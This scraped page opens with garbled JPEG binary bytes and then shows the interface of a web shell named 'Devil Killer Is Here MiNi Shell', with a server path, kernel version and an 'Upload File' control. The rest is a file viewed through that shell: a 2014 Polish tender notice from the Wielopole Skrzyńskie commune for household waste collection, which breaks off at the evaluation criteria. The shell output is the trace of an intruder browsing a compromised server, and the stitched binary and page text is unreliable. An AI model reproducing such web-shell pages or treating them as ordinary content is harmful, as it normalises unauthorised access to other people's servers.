JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140505/149844-N-2014.html

<p class="kh_header"><b>Wielopole Skrzyńskie: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie gminy Wielopole Skrzyńskie</b><br>
<b>Numer ogłoszenia: 149844 - 2014; data zamieszczenia: 05.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielopole Skrzyńskie , Wielopole Skrzyńskie 200, 39-110 Wielopole Skrzyńskie, woj. podkarpackie, tel. 0-17 2214819 w. 45, faks 0-17 2214830.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielopole.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości  zamieszkałych na terenie gminy Wielopole Skrzyńskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na odbiorze i zagospodarowaniu odpadów komunalnych od właścicieli nieruchomości zamieszkałych  na terenie Gminy Wielopole Skrzyńskie . 
Przedmiot zamówienia nie obejmuje podmiotów gospodarczych, szkół, itp.
2. Odpady będą odbierane z terenu gminy Wielopole Skrzyńskie, która liczy obecnie 8500 mieszkańców zamieszkałych stale i czasowo na terenie 5 sołectw: Wielopole Skrzyńskie, Nawsie, Glinik, Broniszów i Brzeziny.
Ilość mieszkańców gminy objętych deklaracjami na odbiór i zagospodarowanie odpadów komunalnych wynosi około 7380, a liczba nieruchomości z których należy odebrać odpady komunalne to około 1812.
Zamawiający zastrzega sobie prawo zmiany ilości punktów odbioru odpadów. Ich ilość w ciągu realizacji zamówienia może ulec zmianie. 
Zbiórka odpadów komunalnych na terenie gminy będzie się odbywać w systemie workowym.
3. Zakres przedmiotu zamówienia obejmuje:
3.1 Odbiór i zagospodarowanie w okresie objętym zamówieniem zmieszanych niesegregowanych odpadów komunalnych  zgromadzonych w  odpowiednio oznakowanych workach z budynków mieszkalnych, wystawionych na trasie odbioru w ilości ok. 280,00  Mg.
3.2 Odbiór i zagospodarowanie w okresie objętym zamówieniem segregowanych odpadów komunalnych, zgromadzonych w odpowiednio oznakowanych workach z budynków mieszkalnych, wystawionych na trasie odbioru, w ilości ok. 210,00 Mg w tym:
          a/ tworzywa sztuczne o kodach 20 01 39 
          b/ szkło o kodach 20 01 02, 15 01 07
          c/ metal o kodach 15 01 04, 20 01 
          d/ papier, tekturę, odzież i tekstylia, opakowania wielomateriałowe ulegające biodegradacji o kodach 20 01 01, 15 01 01, 20 01 10, 20 01 11, 15 01 05, 15 01 06
          e/ odpady kuchenne i odpady ogrodowe o kodach 20 01 08, 20 02 01 
3.3 Odbiór i zagospodarowanie w okresie objętym zamówieniem pozostałych odpadów zebranych jednorazowo w łącznej ilości ok. 80,00 Mg :
           a) odpadów wielkogabarytowych o kodzie 20 03 07
           b) zużytych opon o kodzie 16 01 03 
           c) zużytego sprzętu elektrycznego i elektronicznego o kodzie 20 01 35, 20 01 36
           d) baterie, akumulatory, chemikalia, świetlówki, przeterminowane leki
           e) odpady budowlane i remontowe, które powstały w gospodarstwie domowym w wyniku prowadzenia drobnych robót nie wymagających pozwolenia wydanego przez starostę o kodzie 17 01 01,17 01 02, 17 01 03, 17 01 07, 17 01 80, 17 01 81, 17 01 82, 17 02 01, 17 02 02, 17 02 03. 
Szacowana ilość odpadów komunalnych do odebrania w ramach zamówienia wynosi 
około 570 Mg.
3.4 Podana Ilość odpadów  jest szacunkowa i należy traktować ją orientacyjnie, ponieważ może ona ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego. 
Wykonawcy nie przysługuje prawo odszkodowania za zwiększenie lub zmniejszenie 
wskazanych ilości odpadów komunalnych.
Wykonawca w trakcie realizacji umowy odbierze każdą ilość odpadów zgromadzonych 
w  workach oraz wystawionych podczas jednorazowej zbiórki.
3.5 Nieodpłatne wyposażenie wszystkich gospodarstw domowych w worki na odpady o pojemności 120 l lub 60 l, wykonane z materiału umożliwiającego sprawdzenie rzetelności i jakości segregacji, w następujących kolorach :
             a) worek żółty na tworzywa sztuczne - około 46.000 szt.
             b) worek zielony na szkło białe i kolorowe - około 20.000 szt.
             c) worek czerwony na metal - około 4.000 szt.
             d) worek niebieski na papier, tekturę, odzież i tekstylia, opakowania wielomateriałowe ulegające biodegradacji - około 4.000 szt.
             e) worek brązowy na odpady kuchenne i odpady ogrodowe - około 4.000 szt.           
  f) worek czarny na odpady komunalne niesegregowane (zmieszane) - około 30.000 szt.
Worki przeznaczone do odbioru odpadów mają być oznaczone nadrukiem odpowiadającym ich przeznaczeniu np. tworzywa sztuczne i posiadać logo Wykonawcy.               
3.6 Odbiór odpadów segregowanych i niesegregowanych z terenu gminy Wielopole Skrzyńskie odbywał się będzie z częstotliwością:
              a) z terenu zabudowy rolniczej 1 raz w miesiącu, 
              b) z centrum Wielopola Skrzyńskiego w każdy piątek zgodnie z harmonogramem, ustalonym pomiędzy Wykonawcą a Zamawiającym (załącznik nr 11 do SIWZ trasa odbioru odpadów z centrum Wielopola Skrz.).
3.7 Odbiór odpadów wymienionych w pkt 3.3, wystawionych przez mieszkańców na trasie odbioru odpadów odbędzie się 1 raz w roku w określonym przez Zamawiającego terminie. 
              
3.8 Wykonawca zobowiązany jest drukować kody kreskowe, z podziałem na odpady 
segregowane i odpady zmieszane, które wraz z workami będzie przekazywał właścicielom nieruchomości w ilości niezbędnej do realizacji zamówienia.
3.9  Z chwilą zawarcia umowy Zamawiający przekaże Wykonawcy w formie elektronicznej wygenerowane kody kreskowe, które następnie Wykonawca wydrukuje w formie naklejki w ilości około 108 000 sztuk na papierze odpornym na działanie warunków atmosferycznych umożliwiającym odczyt kodu kreskowego.
3.10  Wykonawca przed dniem 1 lipca 2014r. jest zobowiązany dostarczyć na własny koszt każdemu właścicielowi gospodarstwa :
            1) nalepki identyfikujące poszczególne gospodarstwa domowe w formie kodu kreskowego w ilości niezbędnej na czas realizacji zmówienia
            2) harmonogram odbioru odpadów wraz z informacją, w formie ulotki (zasady segregacji) oraz miejsca odbioru worków na odpady (w przypadku nie pobrania worków lub braku worków w trakcie realizacji zamówienia, Wykonawca wyznaczy co najmniej jeden punkt odbioru worków na sołectwo np. sklep).

3.11 W przypadku niewystarczającej ilości nalepek identyfikujących kolejne kody kreskowe,
Wykonawca będzie dostarczał, zgodnie ze zgłaszanym zapotrzebowaniem mieszkańców, niezwłocznie od zgłoszenia tej okoliczności przez pracownika urzędu gminy.
3.12 W przypadku zgłoszenia braku worków w punktach ich odbioru Wykonawca zobowiązany jest uzupełnić braki w terminie 3 dni od zgłoszenia.

3.13 Wraz z odbiorem odpadów komunalnych, Wykonawca zarejestruje ilość worków na podstawie odczytu kodów kreskowych umieszczonych na workach, odebranych z danej nieruchomości z podziałem na frakcje odpadów oraz datę odbioru.


 
Z wykonanego zadania, sporządzi raport który następnie przekaże Zamawiającemu 
w formie uzgodnionej z Zamawiającym. W tym celu zobowiązany jest dysponować oprogramowaniem umożliwiającym odczyt otrzymanych od  Zamawiającego wygenerowanych kodów kreskowych i ich wydrukowanie (Zamawiający posiada oprogramowanie firmy Softres do obsługi gospodarki odpadami).

3.14 Trasy zbiórki odpadów przebiegają po drogach wojewódzkich, powiatowych gminnych, a także wewnętrznych drogach wiejskich.
3.15 Trasy zbiórki odpadów zostały  przedstawione na mapie stanowiącej załącznik nr 9 SIWZ i wynoszą :
                a) Brzeziny             - ok. 44,5  km
                b) Wielopole Skrz. - ok. 24,1  km 
                c) Nawsie               - ok. 17,1  km
                d) Glinik                  - ok. 21,9  km
                e) Broniszów          - ok. 13,4  km
                 tj. łącznie ok.121 km

3.16 Zamawiający zastrzega również, że wskazana długość tras może ulec wydłużeniu w przypadku konieczności objęcia zbiórką odpadów nieruchomości znajdujących się poza aktualnie ustalonymi  trasami.
3.17 W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.

3.18  Wykonawca zobowiązany jest do utrzymania miejsc po odbiorze odpadów komunalnych w należytej czystości (sprzątanie miejsc po zabraniu worków z odpadami w przypadku jego zanieczyszczenia).

3.19 Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. Wykonawca, przed zakwalifikowaniem odpadów segregowanych do zmieszanych , sporządza na tą okoliczność dokumentację (np. oświadczenie, notatka, dokumentacja fotograficzną)umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. 
Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia w/w zdarzenia. Wykaz właścicieli nieruchomości wraz dokumentacją poświadczającą nieprawidłową segregację odpadów, Wykonawca przekaże niezwłocznie Zamawiającemu.

3.20  W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest do  przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do instalacji do przetwarzania odpadów komunalnych właściwej dla regionu zachodniego województwa podkarpackiego zgodnie z uchwałą Nr XXIV/409/12 z dnia 27 sierpnia 2012 r. w sprawie  przyjęcia projektu Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami  dla Województwa Podkarpackiego. 
 
  
3.21  W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, Wykonawca zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art.17 i 18 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013r. poz.21 z późn.zmian.)

3.22  Wykonawca podczas realizacji zamówienia zapewni w stosunku do faktycznie odebranej ilości odpadów, osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z  ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku.
3.23  Odbioru odpadów komunalnych przez regionalną lub zastępczą instalację do  zagospodarowania odpadów uwzględnioną w WPGO zapewnia sobie Wykonawca.

3.24 Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
3.25 Wykonawca jest zobowiązany do spełnienia wszystkich wymagań z art. 9d ustawy o utrzymaniu czystości porządku w gminach a w szczególności spełniać wymagania określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013(Dz.U.2013,poz.122) w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.

3.26 Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu w wersji papierowej i elektronicznej sprawozdań o jakich mowa w art.9n ustawy z dnia 13 września o utrzymaniu czystości i porządku w gminach.
3.27 W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania  z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o którym mowa w art.9q w/w ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania w posiadaniu których będzie Wykonawca. 
3.28 Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
3.29 Wykonawca będzie przedkładał Zamawiającemu wraz z fakturą za dany okres rozliczeniowy karty przekazania odpadów segregowanych i niesegregowanych .
3.30 Wykonawca odbiera odpady z terenu gminy z nieruchomości zamieszkałych.
Nie dopuszcza się zbierania  - dopełniania pojazdu odpadami z terenu innej gminy 
lub z nieruchomości niezamieszkałych. 
3.31 Cena oferty musi uwzględniać pełen zakres usług i dostaw objętych zamówieniem oraz dodatkowo obejmować wszystkie elementy składające się na przedmiot zamówienia i niezbędne do jego należytego wykonania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3.000,00 zł, (słownie: trzy tysiące  złotych).
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: BS Wielopole Skrzyńskie   Nr 88 9173 0002 0000 0273 2000 0020 z adnotacją /wadium - /Odbiór i zagospodarowanie  odpadów  komunalnych od właścicieli nieruchomości zamieszkałych na  terenie  Gminy Wielopole Skrzyńskie/ 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)  w gwarancjach bankowych, 
4)  w gwarancjach ubezpieczeniowych 
5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42,  po z. 275)  
6) termin wniesienia wadium: wadium należy wnieść przed upływem terminu składania ofert. Wykonawca jest zobowiązany do dołączenia do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.  
7) w przypadku wniesienia wadium w innej formie niż w pieniądzu, Wykonawca jest zobowiązany oryginał wadium umieścić osobno w kopercie, jako załącznik do opakowania , w którym składa się ofertę, natomiast kserokopię dokumentu poświadczonego za zgodność z oryginałem załączyć do oferty.
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na  rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,( w szczególności winni posiadać wpis do Rejestru działalności regulowanej prowadzonego przez Wójta Gminy Wielopole Skrzyńskie) tj. przedstawią oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy.
Zamawiający dokona oceny spełnienia przez Wykonawców ww. warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że wykonywali usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie z podaniem ilości odebranych odpadów, przedmiotu, dat wykonania oraz potwierdzeniem, że usługi te zostały        lub są wykonywane należycie.
Zamawiający dokona oceny spełnienia przez Wykonawców ww. warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym, tj., że na czas realizacji zamówienia będzie dysponował narzędziami, wyposażeniem zakładu i urządzeniami technicznymi - zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 (Dz.U.2013,poz.122) w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wydanym na podstawie art. 9d ust.2 ustawy o utrzymaniu czystości i porządku w gminach.
Zamawiający dokona oceny spełnienia przez Wykonawców ww. warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedłożyć oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wiedzę i doświadczenie oraz wszelkie wymagane ustawowo uprawnienia niezbędne do wykonania przedmiotu niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej, tj., że Wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych.
Zamawiający dokona oceny spełnienia przez Wykonawców ww. warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
